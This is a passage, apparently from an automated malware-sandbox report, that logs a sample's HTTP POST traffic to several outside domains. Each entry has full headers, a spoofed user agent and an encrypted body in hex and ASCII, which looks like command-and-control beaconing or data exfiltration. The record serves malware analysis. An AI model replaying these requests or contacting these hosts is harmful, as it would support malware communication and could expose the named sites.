6c 45 6f 41 57 69 77 44 62 6b 46 6d 30 62 37 53 4e 51 57 6e 62 5a 6b 35 2f 71 6f 5a 49 30 52 64 4d 70 5a 74 38 79 Data Ascii: ZynkpvbqaJZvK8ghUeVmn5mv08YWPDGgisawPLIv2nf8VI9Cs+q8qSk3wd6ZtctuUzukEn7I+nt1U7kIWX2zwdTbSQLCP2IVnAU+1qUVNaZUfDEX+EFUoC86cGADO9FuNFRWFAYnq6TLf2LWeRI0kG4IO32cZ5xrN77i8Oop+zqSjHQDM+qMn9R5/Z+uACSQozlFCt8hAwTaeVMiNLSh7v3cLHd8yWwRVRipYFSozd9y2eUEwdErS04R7wI/TTEZHty3ygrnupnbqjBJUvV2umwwvInBx+x5FCXys0wHajJF0npOpi0wpy1ZTyv+1Xg18KfioBDbX9/xPy8305DdSduuKTAekXQY8d4sJEl/gx0LcmNsHlOvuDgdW+TXq6+MIUyIODU6l71C5kZ++i5+l2dAZJLJIweEoUR0H3PimStJBH3Jnele/Qt6t0ICUFYWydhbYIXrVnExz2MmvqmvBYz855RftrcLf6zr2NQyoD0kN1/5f006lh8u14Onwtm7i0aKfuUdSOlEoAWiwDbkFm0b7SNQWnbZk5/qoZI0RdMpZt8y
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 54 70 57 44 2f 41 63 44 64 4a 62 54 65 6a 34 49 4e 75 51 32 5a 64 43 75 68 4a 58 39 6c 32 2b 52 4b 2f 2b 35 50 6c 51 50 31 35 6b 67 4c 49 52 51 70 6b 4a 7a 78 75 38 58 67 6a 30 7a 63 48 39 45 39 4e 31 36 38 54 71 4d 30 4c 71 74 56 6f 50 67 2b 48 6f 39 33 4e 71 4f 57 75 4c 62 66 4b 47 61 72 74 50 73 4c 51 4b 48 71 33 30 77 46 67 54 4d 35 65 69 6a 59 46 63 4e 71 35 72 63 62 6a 43 4c 70 76 47 4b 62 79 41 6b 56 43 42 45 4c 61 2f 5a 35 31 55 70 38 59 78 45 74 7a 59 75 56 43 53 6c 4c 67 69 47 73 49 73 37 58 4c 49 62 6c 6a 72 37 56 49 4e 73 5a 75 76 53 6b 4a 58 76 6d 4c 73 59 6d 52 74 57 66 4a 32 35 55 51 6c 63 59 34 77 70 4b 4a 49 72 68 47 66 43 34 68 2b 50 58 4c 48 47 58 41 56 53 53 6d 79 56 32 39 63 49 70 63 74 4c 4c 32 59 55 52 47 56 64 4c 2b 57 57 61 49 66 6a 58 73 46 71 4d 59 49 7a 49 68 6c 77 4b 71 65 51 67 36 38 57 77 6d 4d 49 6a 4f 78 2b 63 65 4b 43 4d 4b 46 53 73 53 4c 41 33 4d 70 6c 75 4d 34 6c 48 67 54 2b 50 53 71 69 75 53 6a 4d 79 51 71 57 67 49 41 30 39 39 66 38 6d 50 6c 42 30 32 49 72 69 61 6f 79 73 31 50 35 78 78 74 78 38 47 4d 61 58 2b 31 53 4c 58 47 4b 5a 52 67 59 51 4b 6b 58 31 33 69 41 5a 6b 73 32 65 4d 4f 30 62 6e 45 75 4a 74 72 55 57 4e 4f 78 4f 39 4c 49 63 6b 2b 5a 74 38 2b 50 6e 6e 43 37 52 78 6b 38 51 48 35 58 41 35 59 49 75 68 68 70 52 74 78 43 46 4f 2b 45 41 64 6d 72 51 44 45 66 2b 38 74 77 44 5a 4e 74 46 38 71 44 6c 4e 4a 70 56 6e 33 55 4b 66 69 68 2b 4b 54 75 34 79 7a 32 4f 5a 74 32 6c 78 6b 4c 52 71 30 4b 33 58 4d 33 42 35 5a 2f 79 71 53 64 70 51 46 51 4d 4d 43 59 74 77 32 2b 55 74 62 47 47 36 44 47 68 6e 48 4c 41 56 71 55 62 58 59 56 6f 42 6e 63 36 67 3d 3d Data Ascii: TpWD/AcDdJbTej4INuQ2ZdCuhJX9l2+RK/+5PlQP15kgLIRQpkJzxu8Xgj0zcH9E9N168TqM0LqtVoPg+Ho93NqOWuLbfKGartPsLQKHq30wFgTM5eijYFcNq5rcbjCLpvGKbyAkVCBELa/Z51Up8YxEtzYuVCSlLgiGsIs7XLIbljr7VINsZuvSkJXvmLsYmRtWfJ25UQlcY4wpKJIrhGfC4h+PXLHGXAVSSmyV29cIpctLL2YURGVdL+WWaIfjXsFqMYIzIhlwKqeQg68WwmMIjOx+ceKCMKFSsSLA3MpluM4lHgT+PSqiuSjMyQqWgIA099f8mPlB02Iriaoys1P5xxtx8GMaX+1SLXGKZRgYQKkX13iAZks2eMO0bnEuJtrUWNOxO9LIck+Zt8+PnnC7Rxk8QH5XA5YIuhhpRtxCFO+EAdmrQDEf+8twDZNtF8qDlNJpVn3UKfih+KTu4yz2OZt2lxkLRq0K3XM3B5Z/yqSdpQFQMMCYtw2+UtbGG6DGhnHLAVqUbXYVoBnc6g==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheCookie: rfqtk_wp_session_e2ba905bf306f46faca223d3cb20e2cf=a482be490685e1d568ef837a8a725ebb%7C%7C%7C%7CData Raw: 72 6e 79 46 55 47 53 39 64 70 62 42 66 52 6e 4d 2f 32 6d 77 72 6a 63 69 6f 37 45 63 63 74 4e 6c 32 48 42 6a 45 51 47 71 74 52 31 33 6f 79 4a 66 46 35 71 55 6a 36 36 47 38 46 46 33 35 2f 78 6b 65 77 48 6f 67 6c 77 67 4f 43 38 61 63 55 53 6e 72 31 54 38 51 32 54 32 66 38 79 75 61 4c 55 66 77 6b 65 7a 6b 7a 73 53 4f 68 5a 74 76 6f 63 70 4f 57 37 79 35 33 37 6b 6c 55 49 62 4c 6e 65 72 6e 47 76 66 62 70 2f 6b 72 45 49 30 45 6e 32 65 4c 50 55 46 6f 73 54 44 35 2f 32 44 70 6b 6f 76 6f 45 6e 65 39 58 44 2b 75 68 6e 4c 41 51 61 38 55 73 6b 36 6d 55 57 39 62 4d 56 63 6c 6e 59 4d 4b 68 39 66 79 69 77 42 2f 4f 64 46 68 67 6e 44 63 74 4f 39 44 49 2f 43 61 35 5a 51 64 53 36 68 59 46 66 70 77 55 6a 6e 59 38 78 55 31 45 74 71 72 79 76 74 37 59 4b 4b 54 4b 49 4c 59 6f 51 31 57 48 6f 67 49 42 65 4d 30 6f 73 37 2b 70 58 44 34 35 6c 44 61 30 54 37 76 31 6e 75 35 42 39 4e 43 6a 75 75 67 42 59 64 46 73 59 33 67 64 76 54 38 4d 75 34 49 76 69 7a 47 44 66 57 2b 63 58 71 59 77 50 4a 65 6c 79 53 54 4e 4f 31 79 53 33 61 50 72 43 75 47 4b 63 66 72 51 79 67 77 64 43 38 55 4d 53 76 34 64 43 52 2b 4c 44 70 38 6d 65 55 78 43 77 52 75 39 47 33 4f 54 4b 4e 6c 41 6c 48 39 6b 68 69 2f 49 75 32 2f 43 67 56 35 70 79 53 2b 59 4d 55 63 67 35 31 68 51 45 70 66 30 43 63 59 77 2f 52 76 4e 79 66 77 65 33 75 30 55 74 6f 73 71 6f 76 4e 69 35 33 35 56 63 38 41 4b 72 53 6f 36 59 38 4a 51 48 46 48 48 2b 75 4e 69 41 72 57 30 70 31 31 69 55 5a 63 6c 6b 72 69 35 67 63 32 30 77 69 7a 63 49 49 34 76 4d 6e 58 57 65 49 62 4f 74 48 57 39 4c 51 76 4f 6a 39 67 6d 64 64 39 33 35 4b 31 38 73 37 6f 36 4b 44 6e 2f 46 6b 46 4a 4e 73 44 30 55 71 50 39 69 71 31 30 70 55 69 78 39 63 44 44 37 4f 63 65 48 42 34 77 63 52 49 58 42 74 46 34 36 48 51 57 30 73 73 41 3d 3d Data Ascii: rnyFUGS9dpbBfRnM/2mwrjcio7EcctNl2HBjEQGqtR13oyJfF5qUj66G8FF35/xkewHoglwgOC8acUSnr1T8Q2T2f8yuaLUfwkezkzsSOhZtvocpOW7y537klUIbLnernGvfbp/krEI0En2eLPUFosTD5/2DpkovoEne9XD+uhnLAQa8Usk6mUW9bMVclnYMKh9fyiwB/OdFhgnDctO9DI/Ca5ZQdS6hYFfpwUjnY8xU1Etqryvt7YKKTKILYoQ1WHogIBeM0os7+pXD45lDa0T7v1nu5B9NCjuugBYdFsY3gdvT8Mu4IvizGDfW+cXqYwPJelySTNO1yS3aPrCuGKcfrQygwdC8UMSv4dCR+LDp8meUxCwRu9G3OTKNlAlH9khi/Iu2/CgV5pyS+YMUcg51hQEpf0CcYw/RvNyfwe3u0UtosqovNi535Vc8AKrSo6Y8JQHFHH+uNiArW0p11iUZclkri5gc20wizcII4vMnXWeIbOtHW9LQvOj9gmdd935K18s7o6KDn/FkFJNsD0UqP9iq10pUix9cDD7OceHB4wcRIXBtF46HQW0ssA==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 4c 4a 68 43 5a 75 49 68 62 35 61 73 46 7a 6a 35 56 62 65 6c 64 6d 57 39 53 6a 35 79 36 30 44 66 4e 74 5a 51 48 62 71 42 4f 74 47 68 68 33 57 4c 55 61 34 59 73 2b 4c 63 39 37 53 4e 4c 77 50 75 52 2b 5a 36 46 52 6f 57 4a 72 4a 72 38 6b 69 7a 55 4c 66 47 73 6a 43 5a 43 30 62 6e 71 55 58 37 51 34 65 30 30 59 76 69 56 7a 44 37 58 58 71 6c 38 4c 70 47 37 68 5a 65 77 35 2b 39 2f 4a 4f 38 75 6a 63 56 6b 78 30 76 6b 77 63 78 4f 6c 66 38 38 6d 78 76 52 34 4d 52 31 4d 6b 54 37 32 77 79 72 76 35 77 30 77 31 46 63 4c 72 32 6f 62 70 52 4d 76 50 46 55 30 55 48 56 58 65 66 69 58 4b 39 41 71 31 30 2b 51 6b 43 39 67 65 2f 4b 6b 69 57 47 31 31 52 6b 6c 65 76 77 57 52 38 5a 58 4a 71 58 39 7a 58 73 58 6f 44 4e 36 75 78 72 6c 62 30 68 52 42 47 6b 35 4a 48 55 58 74 36 46 37 6d 67 4a 4d 4e 68 33 4e 69 69 76 31 55 68 33 41 6f 66 59 4f 77 6b 4d 52 56 76 48 35 50 56 52 4d 6c 33 2f 6f 70 30 50 44 52 43 75 4a 68 36 69 5a 6a 71 71 53 64 74 50 33 4a 71 47 45 62 5a 4b 71 62 79 75 36 39 6c 69 6d 58 5a 34 64 51 73 53 7a 4d 71 30 64 49 55 61 68 72 45 41 6f 6e 53 6c 50 4f 4b 79 47 2f 58 2f 32 4d 66 56 73 57 35 6c 34 63 34 57 4f 33 37 49 63 51 51 66 6b 67 4c 36 70 53 39 48 71 66 55 43 54 65 4b 6d 76 78 42 48 6a 47 39 32 4d 4d 4c 30 70 73 41 78 46 44 37 56 79 2f 2b 61 6b 36 46 48 69 2b 34 6e 45 78 35 4b 77 49 56 4b 41 6c 49 31 77 68 51 33 79 7a 4d 77 53 44 78 74 52 47 74 31 65 4e 30 46 4d 65 46 76 44 57 64 2f 6b 55 78 30 73 48 61 36 71 2b 73 36 5a 5a 55 48 71 70 38 69 42 56 6a 49 41 66 64 44 4f 5a 70 72 6f 56 43 66 61 47 72 75 64 64 63 47 7a 34 38 62 2b 75 75 44 2b 2f 70 68 71 34 4a 6b 54 49 31 34 68 59 38 57 49 6a 50 34 6c 31 55 55 74 45 71 59 6e 45 64 74 63 31 64 62 65 4f 77 54 7a 49 33 61 4b 55 46 62 6a 43 35 71 4b 4f 4a 49 33 67 3d Data Ascii: LJhCZuIhb5asFzj5VbeldmW9Sj5y60DfNtZQHbqBOtGhh3WLUa4Ys+Lc97SNLwPuR+Z6FRoWJrJr8kizULfGsjCZC0bnqUX7Q4e00YviVzD7XXql8LpG7hZew5+9/JO8ujcVkx0vkwcxOlf88mxvR4MR1MkT72wyrv5w0w1FcLr2obpRMvPFU0UHVXefiXK9Aq10+QkC9ge/KkiWG11RklevwWR8ZXJqX9zXsXoDN6uxrlb0hRBGk5JHUXt6F7mgJMNh3Niiv1Uh3AofYOwkMRVvH5PVRMl3/op0PDRCuJh6iZjqqSdtP3JqGEbZKqbyu69limXZ4dQsSzMq0dIUahrEAonSlPOKyG/X/2MfVsW5l4c4WO37IcQQfkgL6pS9HqfUCTeKmvxBHjG92MML0psAxFD7Vy/+ak6FHi+4nEx5KwIVKAlI1whQ3yzMwSDxtRGt1eN0FMeFvDWd/kUx0sHa6q+s6ZZUHqp8iBVjIAfdDOZproVCfaGruddcGz48b+uuD+/phq4JkTI14hY8WIjP4l1UUtEqYnEdtc1dbeOwTzI3aKUFbjC5qKOJI3g=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 65 75 6f 61 35 30 6d 68 65 35 5a 39 42 34 79 41 6d 44 6f 61 34 32 4c 63 32 2b 4e 6e 32 4e 38 67 6a 53 67 4a 51 6d 6c 4e 73 48 52 34 56 6e 33 65 72 43 62 33 51 37 58 51 66 4b 56 75 30 6a 34 4b 46 50 73 4a 4f 59 6d 69 37 63 77 79 73 67 52 48 43 4f 55 6d 75 30 7a 6f 45 50 42 65 45 65 61 49 78 4a 59 7a 49 33 35 79 6c 4a 54 58 35 79 54 58 32 41 61 4b 34 63 4b 79 32 6a 63 2f 59 50 32 77 6a 63 6d 32 52 5a 51 76 2b 79 45 74 66 4b 74 38 38 4e 56 46 69 46 36 72 51 64 71 59 44 4c 6e 44 65 62 50 72 50 65 43 49 55 78 72 30 4c 59 56 4e 35 38 7a 78 74 6b 63 66 55 59 2f 6e 31 30 74 6c 4f 5a 69 58 6b 6a 5a 6a 69 47 63 6c 2f 44 2f 47 52 37 58 4c 6e 61 46 47 47 6f 34 57 76 6b 7a 57 72 54 48 33 62 56 33 46 75 64 33 54 37 70 6b 6d 75 72 4a 46 52 2f 7a 46 6f 6f 44 4d 72 2b 62 39 37 35 64 79 31 6b 51 58 48 4b 79 6f 52 6e 56 57 62 4c 56 7a 57 59 50 4a 72 54 42 4a 64 38 31 49 63 35 73 68 4e 61 65 38 68 4f 43 48 57 57 73 68 6f 37 4b 44 70 54 76 71 62 61 74 6b 51 61 2f 52 74 66 74 61 42 69 75 70 6c 57 69 37 7a 54 65 37 2b 55 67 4e 4b 33 74 43 4a 30 43 70 44 7a 34 51 77 57 6f 38 77 70 4f 6e 4c 58 36 59 6a 46 58 46 48 57 6c 79 49 68 36 66 72 6b 39 34 59 57 7a 5a 43 72 71 4f 4d 52 31 6a 68 37 65 4a 57 78 73 57 55 4c 31 6a 62 43 74 46 33 39 34 30 49 6c 64 70 75 38 62 4c 6b 7a 62 54 4d 30 79 66 4e 59 4e 48 44 47 49 65 69 6f 42 50 39 74 62 77 2f 6f 4a 37 48 6b 46 6b 34 42 4a 30 67 6e 58 6e 44 73 52 75 66 44 5a 59 45 50 79 35 61 49 53 6a 64 62 52 70 51 32 46 34 41 48 58 39 68 49 69 69 71 62 57 38 66 6c 55 6c 6e 33 6c 6d 76 79 71 77 72 6b 49 75 45 34 56 4b 6c 41 7a 69 4c 76 47 78 42 6c 32 58 50 5a 75 36 6d 69 41 6e 58 66 35 57 32 4a 58 34 79 59 47 7a 2f 4c 32 4b 48 63 77 3d Data Ascii: euoa50mhe5Z9B4yAmDoa42Lc2+Nn2N8gjSgJQmlNsHR4Vn3erCb3Q7XQfKVu0j4KFPsJOYmi7cwysgRHCOUmu0zoEPBeEeaIxJYzI35ylJTX5yTX2AaK4cKy2jc/YP2wjcm2RZQv+yEtfKt88NVFiF6rQdqYDLnDebPrPeCIUxr0LYVN58zxtkcfUY/n10tlOZiXkjZjiGcl/D/GR7XLnaFGGo4WvkzWrTH3bV3Fud3T7pkmurJFR/zFooDMr+b975dy1kQXHKyoRnVWbLVzWYPJrTBJd81Ic5shNae8hOCHWWsho7KDpTvqbatkQa/RtftaBiuplWi7zTe7+UgNK3tCJ0CpDz4QwWo8wpOnLX6YjFXFHWlyIh6frk94YWzZCrqOMR1jh7eJWxsWUL1jbCtF3940Ildpu8bLkzbTM0yfNYNHDGIeioBP9tbw/oJ7HkFk4BJ0gnXnDsRufDZYEPy5aISjdbRpQ2F4AHX9hIiiqbW8flUln3lmvyqwrkIuE4VKlAziLvGxBl2XPZu6miAnXf5W2JX4yYGz/L2KHcw=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 4d 76 68 6d 35 6e 47 62 65 35 59 4a 4c 2f 58 7a 6b 4e 36 74 54 73 70 67 66 6a 4b 76 73 51 6e 4f 4e 66 47 6f 34 52 6a 53 45 59 59 31 53 51 67 4c 65 34 4c 53 62 4f 55 68 72 39 63 67 45 42 52 53 73 63 37 36 67 2b 41 43 42 67 41 53 2f 44 37 6a 6e 33 48 51 70 64 6d 41 36 44 76 37 59 52 30 4a 6e 69 6b 56 56 78 2b 6e 4a 4e 47 32 74 5a 79 6e 30 45 61 41 2f 44 6d 37 51 56 36 68 36 43 52 65 61 48 49 54 42 38 5a 59 6f 6e 55 51 6b 41 42 4a 50 55 59 51 50 56 52 47 57 45 50 67 37 44 46 66 72 73 74 59 74 70 52 44 73 41 44 4e 38 2b 67 4a 7a 30 48 2b 64 36 31 70 78 61 39 78 78 57 6b 57 6f 76 76 30 5a 45 38 73 67 76 33 77 31 66 73 79 53 35 38 4d 45 48 6a 7a 67 54 54 45 7a 53 48 6e 59 4e 53 35 79 79 42 32 59 71 64 47 76 2f 6e 5a 31 31 6f 2b 70 7a 48 35 58 74 41 33 70 33 67 53 42 33 55 77 66 69 42 50 68 74 6e 6e 64 50 59 54 38 41 79 70 5a 32 58 67 67 32 42 4b 4c 6b 68 32 6e 73 52 39 6f 48 54 4e 34 48 62 53 5a 66 33 7a 79 73 74 66 38 57 71 61 69 4d 45 5a 56 77 65 6b 52 79 2f 30 47 7a 30 47 32 4a 2f 54 36 63 7a 55 46 44 41 6a 31 4f 31 47 63 70 31 36 66 65 32 66 34 58 38 2b 69 6c 79 4e 51 6a 46 76 73 52 6a 73 4c 53 65 31 5a 59 33 4a 6c 4b 4a 43 57 36 62 4e 53 32 45 4b 6f 54 6d 51 4a 56 72 72 71 6c 73 42 76 50 61 36 6a 77 43 32 33 65 72 4c 41 68 69 68 6b 70 48 4c 6a 38 68 6b 36 67 31 33 62 6d 75 4f 57 6a 54 34 6a 68 4a 68 4c 65 46 50 6f 39 66 7a 74 36 38 57 77 33 59 6a 4f 35 4a 47 64 47 6f 79 67 6b 36 4f 68 4c 38 47 2f 6e 6d 66 78 65 4a 56 6a 67 45 39 68 31 57 79 7a 2b 6a 55 61 54 61 51 47 38 6c 44 73 63 6f 54 70 4a 4d 49 55 7a 6e 4d 4d 4b 4b 70 6a 64 47 31 6a 4b 7a 50 65 6a 4b 6e 35 37 39 4c 41 34 64 69 50 6b 69 42 52 44 34 34 6c 4c 45 75 6e 77 3d 3d Data Ascii: Mvhm5nGbe5YJL/XzkN6tTspgfjKvsQnONfGo4RjSEYY1SQgLe4LSbOUhr9cgEBRSsc76g+ACBgAS/D7jn3HQpdmA6Dv7YR0JnikVVx+nJNG2tZyn0EaA/Dm7QV6h6CReaHITB8ZYonUQkABJPUYQPVRGWEPg7DFfrstYtpRDsADN8+gJz0H+d61pxa9xxWkWovv0ZE8sgv3w1fsyS58MEHjzgTTEzSHnYNS5yyB2YqdGv/nZ11o+pzH5XtA3p3gSB3UwfiBPhtnndPYT8AypZ2Xgg2BKLkh2nsR9oHTN4HbSZf3zystf8WqaiMEZVwekRy/0Gz0G2J/T6czUFDAj1O1Gcp16fe2f4X8+ilyNQjFvsRjsLSe1ZY3JlKJCW6bNS2EKoTmQJVrrqlsBvPa6jwC23erLAhihkpHLj8hk6g13bmuOWjT4jhJhLeFPo9fzt68Ww3YjO5JGdGoygk6OhL8G/nmfxeJVjgE9h1Wyz+jUaTaQG8lDscoTpJMIUznMMKKpjdG1jKzPejKn579LA4diPkiBRD44lLEunw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 54 70 57 44 2f 41 63 44 64 4a 62 54 65 6a 34 49 4e 75 51 32 5a 64 43 75 68 4a 58 39 6c 32 2b 52 4b 2f 2b 35 50 6c 51 50 31 35 6b 67 4c 49 52 51 70 6b 4a 7a 78 75 38 58 67 6a 30 7a 63 48 39 45 39 4e 31 36 38 54 71 4d 30 4c 71 74 56 6f 50 67 2b 48 6f 39 33 4e 71 4f 57 75 4c 62 66 4b 47 61 72 74 50 73 4c 51 4b 48 71 33 30 77 46 67 54 4d 35 65 69 6a 59 46 63 4e 71 35 72 63 62 6a 43 4c 70 76 47 4b 62 79 41 6b 56 43 42 45 4c 61 2f 5a 35 31 55 70 38 59 78 45 74 7a 59 75 56 43 53 6c 4c 67 69 47 73 49 73 37 58 4c 49 62 6c 6a 72 37 56 49 4e 73 5a 75 76 53 6b 4a 58 76 6d 4c 73 59 6d 52 74 57 66 4a 32 35 55 51 6c 63 59 34 77 70 4b 4a 49 72 68 47 66 43 34 68 2b 50 58 4c 48 47 58 41 56 53 53 6d 79 56 32 39 63 49 70 63 74 4c 4c 32 59 55 52 47 56 64 4c 2b 57 57 61 49 66 6a 58 73 46 71 4d 59 49 7a 49 68 6c 77 4b 71 65 51 67 36 38 57 77 6d 4d 49 6a 4f 78 2b 63 65 4b 43 4d 4b 46 53 73 53 4c 41 33 4d 70 6c 75 4d 34 6c 48 67 54 2b 50 53 71 69 75 53 6a 4d 79 51 71 57 67 49 41 30 39 39 66 38 6d 50 6c 42 30 32 49 72 69 61 6f 79 73 31 50 35 78 78 74 78 38 47 4d 61 58 2b 31 53 4c 58 47 4b 5a 52 67 59 51 4b 6b 58 31 33 69 41 5a 6b 73 32 65 4d 4f 30 62 6e 45 75 4a 74 72 55 57 4e 4f 78 4f 39 4c 49 63 6b 2b 5a 74 38 2b 50 6e 6e 43 37 52 78 6b 38 51 48 35 58 41 35 59 49 75 68 68 70 52 74 78 43 46 4f 2b 45 41 64 6d 72 51 44 45 66 2b 38 74 77 44 5a 4e 74 46 38 71 44 6c 4e 4a 70 56 6e 33 55 4b 66 69 68 2b 4b 54 75 34 79 7a 32 4f 5a 74 32 6c 78 6b 4c 52 71 30 4b 33 58 4d 33 42 35 5a 2f 79 71 53 64 70 51 46 51 4d 4d 43 59 74 77 32 2b 55 74 62 47 47 36 44 47 68 6e 48 4c 41 56 71 55 62 58 59 56 6f 42 6e 63 36 67 3d 3d Data Ascii: TpWD/AcDdJbTej4INuQ2ZdCuhJX9l2+RK/+5PlQP15kgLIRQpkJzxu8Xgj0zcH9E9N168TqM0LqtVoPg+Ho93NqOWuLbfKGartPsLQKHq30wFgTM5eijYFcNq5rcbjCLpvGKbyAkVCBELa/Z51Up8YxEtzYuVCSlLgiGsIs7XLIbljr7VINsZuvSkJXvmLsYmRtWfJ25UQlcY4wpKJIrhGfC4h+PXLHGXAVSSmyV29cIpctLL2YURGVdL+WWaIfjXsFqMYIzIhlwKqeQg68WwmMIjOx+ceKCMKFSsSLA3MpluM4lHgT+PSqiuSjMyQqWgIA099f8mPlB02Iriaoys1P5xxtx8GMaX+1SLXGKZRgYQKkX13iAZks2eMO0bnEuJtrUWNOxO9LIck+Zt8+PnnC7Rxk8QH5XA5YIuhhpRtxCFO+EAdmrQDEf+8twDZNtF8qDlNJpVn3UKfih+KTu4yz2OZt2lxkLRq0K3XM3B5Z/yqSdpQFQMMCYtw2+UtbGG6DGhnHLAVqUbXYVoBnc6g==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 62 58 62 33 63 76 38 72 67 4a 61 42 2f 37 55 35 33 73 6c 66 50 6f 6a 61 68 44 70 56 34 4e 56 49 6f 2f 50 4d 55 32 32 49 46 55 61 68 66 42 46 69 65 71 79 58 41 43 7a 42 50 76 62 69 34 71 59 6b 53 46 61 70 70 37 65 30 4b 48 45 53 58 67 75 77 36 75 43 31 69 48 37 48 2b 78 73 7a 68 43 6e 6e 57 44 78 78 48 58 6c 4d 57 66 6c 34 6d 67 4f 41 4f 43 6b 68 49 41 75 41 45 76 35 6d 31 4d 55 31 71 4f 45 6c 6a 73 6c 2f 4b 43 2f 37 67 53 51 77 56 64 52 69 4c 6b 69 32 57 6d 36 7a 4d 73 57 67 45 33 63 46 43 4a 50 52 6f 62 33 73 7a 4c 34 57 62 6e 6a 69 78 45 67 43 32 53 68 4f 62 73 36 6c 43 34 75 66 4d 47 68 64 63 74 67 45 66 41 36 4a 59 77 67 33 31 55 73 53 30 45 37 5a 44 66 66 72 73 74 77 51 68 64 48 78 31 79 30 38 5a 74 57 5a 44 56 49 30 62 78 59 57 57 43 75 45 69 45 55 2f 70 38 39 46 71 4e 36 53 4c 76 63 78 4b 32 51 31 4e 45 42 2f 4b 59 62 46 46 5a 68 34 42 54 39 4a 69 59 59 6d 4f 4d 44 63 55 77 4f 6d 75 53 63 47 42 34 4b 4e 74 2b 76 38 51 4e 62 32 50 37 61 44 33 48 72 72 71 73 31 61 77 58 77 6e 69 6d 30 44 59 34 55 42 47 53 74 5a 35 74 75 66 34 31 44 64 37 45 73 70 57 56 76 59 73 34 78 35 79 54 50 53 4c 72 7a 71 4b 35 63 59 4a 76 69 78 45 70 45 51 6a 79 69 34 4a 48 65 46 31 52 4e 78 5a 6d 50 6b 4d 62 32 67 4e 53 56 4f 35 31 32 4d 67 53 44 51 66 79 79 6c 57 2f 66 6b 37 62 37 57 38 30 38 5a 6a 61 44 36 74 76 66 4f 31 30 66 37 59 34 5a 43 65 78 6d 76 68 76 75 6c 6f 45 35 34 74 55 53 56 4c 44 4c 47 54 47 75 46 49 61 58 35 4f 70 7a 66 44 71 75 31 52 42 79 75 79 73 6e 44 64 6f 59 52 31 5a 73 6c 76 51 38 4c 68 4b 7a 50 30 7a 44 36 77 67 67 36 49 35 4b 65 31 6a 50 59 47 37 65 54 55 56 59 67 72 73 34 36 69 35 64 35 6c 32 72 6e 71 49 2f 41 Data Ascii: bXb3cv8rgJaB/7U53slfPojahDpV4NVIo/PMU22IFUahfBFieqyXACzBPvbi4qYkSFapp7e0KHESXguw6uC1iH7H+xszhCnnWDxxHXlMWfl4mgOAOCkhIAuAEv5m1MU1qOEljsl/KC/7gSQwVdRiLki2Wm6zMsWgE3cFCJPRob3szL4WbnjixEgC2ShObs6lC4ufMGhdctgEfA6JYwg31UsS0E7ZDffrstwQhdHx1y08ZtWZDVI0bxYWWCuEiEU/p89FqN6SLvcxK2Q1NEB/KYbFFZh4BT9JiYYmOMDcUwOmuScGB4KNt+v8QNb2P7aD3Hrrqs1awXwnim0DY4UBGStZ5tuf41Dd7EspWVvYs4x5yTPSLrzqK5cYJvixEpEQjyi4JHeF1RNxZmPkMb2gNSVO512MgSDQfyylW/fk7b7W808ZjaD6tvfO10f7Y4ZCexmvhvuloE54tUSVLDLGTGuFIaX5OpzfDqu1RByuysnDdoYR1ZslvQ8LhKzP0zD6wgg6I5Ke1jPYG7eTUVYgrs46i5d5l2rnqI/A
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 65 75 6f 61 35 30 6d 68 65 35 5a 39 42 34 79 41 6d 44 6f 61 34 32 4c 63 32 2b 4e 6e 32 4e 38 67 6a 53 67 4a 51 6d 6c 4e 73 48 52 34 56 6e 33 65 72 43 62 33 51 37 58 51 66 4b 56 75 30 6a 34 4b 46 50 73 4a 4f 59 6d 69 37 63 77 79 73 67 52 48 43 4f 55 6d 75 30 7a 6f 45 50 42 65 45 65 61 49 78 4a 59 7a 49 33 35 79 6c 4a 54 58 35 79 54 58 32 41 61 4b 34 63 4b 79 32 6a 63 2f 59 50 32 77 6a 63 6d 32 52 5a 51 76 2b 79 45 74 66 4b 74 38 38 4e 56 46 69 46 36 72 51 64 71 59 44 4c 6e 44 65 62 50 72 50 65 43 49 55 78 72 30 4c 59 56 4e 35 38 7a 78 74 6b 63 66 55 59 2f 6e 31 30 74 6c 4f 5a 69 58 6b 6a 5a 6a 69 47 63 6c 2f 44 2f 47 52 37 58 4c 6e 61 46 47 47 6f 34 57 76 6b 7a 57 72 54 48 33 62 56 33 46 75 64 33 54 37 70 6b 6d 75 72 4a 46 52 2f 7a 46 6f 6f 44 4d 72 2b 62 39 37 35 64 79 31 6b 51 58 48 4b 79 6f 52 6e 56 57 62 4c 56 7a 57 59 50 4a 72 54 42 4a 64 38 31 49 63 35 73 68 4e 61 65 38 68 4f 43 48 57 57 73 68 6f 37 4b 44 70 54 76 71 62 61 74 6b 51 61 